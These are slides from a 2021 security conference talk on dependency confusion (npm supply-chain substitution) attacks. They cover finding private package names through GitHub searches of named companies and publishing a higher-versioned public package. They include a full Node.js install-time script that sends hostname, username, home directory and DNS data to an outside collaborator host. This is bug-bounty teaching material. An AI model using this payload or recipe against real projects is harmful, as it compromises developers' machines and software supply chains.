Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Dependency Confusion

B46a00cafe34a9437d3a5bc6afc5bee3?s=47 Aditya Shende
November 23, 2021

Dependency Confusion

DAMNCON, the cyber conference. This will provide you with meaningful insights and the right knowledge for you to move to the next step.

Speaker: Aditya Shende

Topic: Dependency Confusion


Aditya Shende

November 23, 2021


  1. Bug Bounty Hunter and Trainer Red Team Ops @Agri10x Masters

    In Cyber Security @UEA Interested in WebApps, Functional Exploits and Bikes INDIAN WHOAMI ?
  2. Dependecy Confusion

  3. What is Dependency Confusion ??? A Dependency Confusion attack, also

    known as a supply chain substitution attack, occurs when a software installer script is tricked into downloading a malicious code file from a public repository rather than the intended file of the same name from an internal repository.
  4. None
  5. Difference ??? 1. As seen in the above image, the

    Public Package contains a higher version than the Private Package. 2. As a result, if the package indexing is not completed properly, it will automatically retrieve the Higher version package from the Public Registry.
  6. How to find Private Packages ? Within Organization, use Github

    Dorking with keywords like package.json org:Samsung package.json Use filters like : language:json org:Samsung package.json language:json org:target_org package.json language:json
  7. None
  8. It can be also found using npm package.json disclosure nuclei

  9. Case Study https://github.com/facebook/flipper/blob/45ce538c8dd6b44 8388a01e2ed4fa398956e5e20/desktop/eslint-plugin- flipper/package.json 1. 2. Package Name: eslint-plugin-flipper

    3. Type: Private wget https://github.com/facebook/flipper/blob/45ce538c8dd6b44 8388a01e2ed4fa398956e5e20/desktop/eslint-plugin- flipper/package.json
  10. We have to check if private package exist or not

    We have to check on offcial website : https://www.npmjs.com/
  11. Install NPM using the following command Creating Malicious Packages (NPM)

    apt install npm npm login npm init : Create package 1. 2. 3.
  12. After successful creation of the package.json file , we need

    to edit the created file to execute our own scripts and command. Index.js const os = require("os");const dns = require("dns");const querystring = require("querystring");const https = require("https");const packageJSON = require("./package.json");const package = packageJSON.name;const trackingData = JSON.stringify({p: package,c: __dirname,hd: os.homedir(),hn: os.hostname(),un: os.userInfo().username,dns: dns.getServers(),r: packageJSON ? packageJSON.___resolved : undefined,v: packageJSON.version,pjson: packageJSON,});var postData = querystring.stringify({msg: trackingData,});var options = {hostname: "burpcollaborator.net", //replace burpcollaborator.net with Interactsh or pipedreamport: 443,path: "/",method: "POST",headers: {"Content-Type": "application/x-www-form-urlencoded","Content-Length": postData.length,},};var req = https.request(options, (res) => {res.on("data", (d) => {process.stdout.write(d);});});req.on("error", (e) => {// console.error(e);});req.write(postData);req.end();
  13. Now there will be two files created package.json , index.js.

    Before publishing the package to public registry make sure this package name Doesn’t exist in the Public Registry. Use the following command to publish the package. Pushing into Public Registry (NPM)
  14. None
  15. The Published package contains Higher Version compared to the original

  16. packages, our package.json file preinstall scripts will execute the index.js

    file and obtain the hostname, directory, IP address, and username as shown below.
  17. Thank you guys DAMNcon2021